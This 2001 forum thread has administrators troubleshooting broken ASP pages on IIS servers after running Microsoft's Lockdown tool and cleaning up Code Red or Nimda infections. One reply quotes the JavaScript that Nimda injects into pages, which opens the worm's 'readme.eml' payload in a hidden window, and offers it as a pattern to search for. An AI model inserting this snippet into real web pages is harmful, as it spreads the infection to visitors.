|
| |
|
|
d00nson
Posts: 142
From: Australia
Status: offline
 |
ASP broken after using IIS Lockdown - 9/18/2001 20:17:00
Has anyone used the IIS lockdown tool from Microsoft at ?http://www.microsoft.com/technet/itsolutions/security/tools/locktool.asp Since using it, my .ASP pages are not working (I get a "object disabled" error in the browser) but .HTML pages are OK. And yes, I used Advanced Lockdown and unchecked "disable ASP".
|
|
|
|
Rian
Posts: 1960
From: Lincoln, Nebraska USA
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/18/2001 20:31:00
Have not used it yet.....Did you disable "scripting" anywhere?
Did you try the "undo" that is in the tool? Rian ![]("http://www.frontpagewebmaster.com/ubb/smile.gif") ------------------
"Designing The Future"
SR Web Creators
http://www.srwebcreators.com "What boots up must come down..."
| |
|
|
|
d00nson
Posts: 142
From: Australia
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/18/2001 21:59:00
Yes I did Ryan. Thanks. The funny thing is, my website wouldn't even respond before (due to something broken by the worm I assume), but after locking it down, I get very fast ACKs but I can't access .ASP pages.
| |
|
|
|
d00nson
Posts: 142
From: Australia
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/21/2001 23:38:00
Has anyone experienced broken .ASP pages after removing the CodeRed worm or it's variants from Win2K? I'd love to hear from you. It seems all .HTM pages are fine. But .ASP pages just time out or respond with HTTP 500 errors such as server is busy or application restarting.
| |
|
|
|
brobey
Posts: 7
From: Washington, DC USA
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/25/2001 16:38:00
My ISP reports similar problem with ASP pages returning 500 errors. The site was infrected by the NIMDA virus. Everything is back accept the ASP pages.
| |
|
|
|
d00nson
Posts: 142
From: Australia
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/26/2001 20:22:00
thx brobey. surely we can't be other only ones out there...I sick of restoring from a ghost image and rebuilding from scratch. It seems the bad guys are finding holes in IIS faster than MS can patch them. Someone please tell me there is a way to unf**k ASP without reformatting.
| |
|
|
|
JessCoburn
Posts: 83
From: Boca Raton, FL US
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/28/2001 20:28:00
the lockdown tool has an uninstall feature I believe. It creates a log of what it changed. Also, have you checked the event viewer? It may lend a clue.Jess
| |
|
|
|
Rian
Posts: 1960
From: Lincoln, Nebraska USA
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/28/2001 13:43:00
quote:
Originally posted by d00nson:
Someone please tell me there is a way to unf**k ASP without reformatting.
Hate to tell you this, but my understanding is that the *only* sure way to get rid of NIMDA is to format and clean install from known good media...... http://www.cert.org/advisories/CA-2001-26.html and http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Curious.... Do you know HOW you got infected? Rian ------------------
"Designing The Future"
SR Web Creators
http://www.srwebcreators.com "What boots up must come down..."
| |
|
|
|
davebukouricz
Posts: 300
From: Ma None
Status: offline
|
RE: ASP broken after using IIS Lockdown - 9/29/2001 20:54:00
Since cleaning the virus off of my system, IIS will no longer start. Even tried re-installing Win2k and this didn't fix the problem.
| |
|
|
|
d00nson
Posts: 142
From: Australia
Status: offline
|
RE: ASP broken after using IIS Lockdown - 10/2/2001 20:27:00
To answer Rian's question: I was one of the first ppl to be infected by codered. I must have got it from a compromised machine on the web. I believe from my system logs that it would have been just before I installed a hardware firewall router as after that I could see it fending off literally hundreds of http requests to port 80. I read about the worm on SARC.com a few days later when it became an epidemic. I've had similar experiences as dave. whatever I do, I just can't seem to get my .ASP pages working again. Does the worm modify .ASP files? However I've scrutinised a few of my hand coded ASP pages and they seem fine so I'm at a total loss.
| |
|
|
|
storm
Posts: 421
Status: offline
|
RE: ASP broken after using IIS Lockdown - 10/2/2001 20:53:00
do a search of your .asp pages for this code:<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script> this is the code that the virus inserts. ------------------
storm...
"Someone put forth the proposition that you can patition the lord with prayer, patition the lord with prayer, patition the lord with prayer...YOU CANNOT PATITION THE LORD WITH PRAYER"
| |
|
|
|
d00nson
Posts: 142
From: Australia
Status: offline
|
RE: ASP broken after using IIS Lockdown - 10/3/2001 20:37:00
Thanks for your input Storm. I was hit by codered, not nimda. But I checked for the code anyway. Nothing showed up.
| |
|
 New Messages |
 No New Messages |
 Hot Topic w/ New Messages |
 Hot Topic w/o New Messages |
 Locked w/ New Messages |
 Locked w/o New Messages |
|
Post New Thread
Reply to Message
Post New Poll
Submit Vote
Delete My Own Post
Delete My Own Thread
Rate Posts
|
|
|
Printable Version 
